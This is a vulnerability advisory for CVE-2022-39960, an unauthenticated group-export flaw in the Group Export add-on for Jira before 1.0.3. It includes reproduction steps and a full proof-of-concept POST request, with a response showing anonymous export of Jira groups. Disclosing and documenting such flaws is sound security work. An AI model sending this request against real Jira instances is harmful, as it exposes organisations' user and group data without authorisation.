Headline
CVE-2022-39960: Unauthenticated Group Export for Jira < 1.0.3
The Netic Group Export add-on before 1.0.3 for Atlassian Jira does not perform authorization checks. This might allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI.
Unauthenticated Group Export for Jira < 1.0.3
Vulnerability Type: Unauthenticated Group Export
Vendor of Product: Atlassian Jira
Affected Product Code Base: Group Export for Jira
Product Version: < 1.0.3
Description: The Group Export for Jira < 1.0.3 versions allow unauthenticated user to export the groups from the Jira instance.
Attack Vectors: Attacker could make an HTTP request to the affected endpoint and get the list of Jira groups present.
Attack Type: Remote
Endpoint: /plugins/servlet/groupexportforjira/admin/json
Assigned CVE-ID: CVE-2022-39960
Steps To Reproduce
1. Issue a HTTP POST request to the following endpoint: https://<jira.example.com>/plugins/servlet/groupexportforjira/admin/[format]
2. For the HTTP POST Data send the following: “groupexport_searchstring=&groupexport_download=true”
#PoC
[REQUEST]
POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1
Host: jira.example.local
Content-Length: 51
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
groupexport_searchstring=&groupexport_download=true
[RESPONSE]
HTTP/1.1 200
X-AREQUESTID: 996x459x1
Referrer-Policy: strict-origin-when-cross-origin
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: sandbox
Strict-Transport-Security: max-age=31536000
Set-Cookie: atlassian.xsrf.token=B2KZ-BVLZ-WLZO-E635_0caad26e8df61a1995bb595e1e00d6f869571707_lout; Path=/
X-AUSERNAME: anonymous
Content-Disposition: attachment; filename="jira-group-export-41178cce-e033-4f0a-bfad-c909e2435c5d.json"
Vary: User-Agent
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 815
{"jiraGroupObjects":[{"groupName":"jira-administrators","jiraGroupApplicationRoleObjects":[{"name":"Jira Software"}],"users":1, [REDACTED]}]}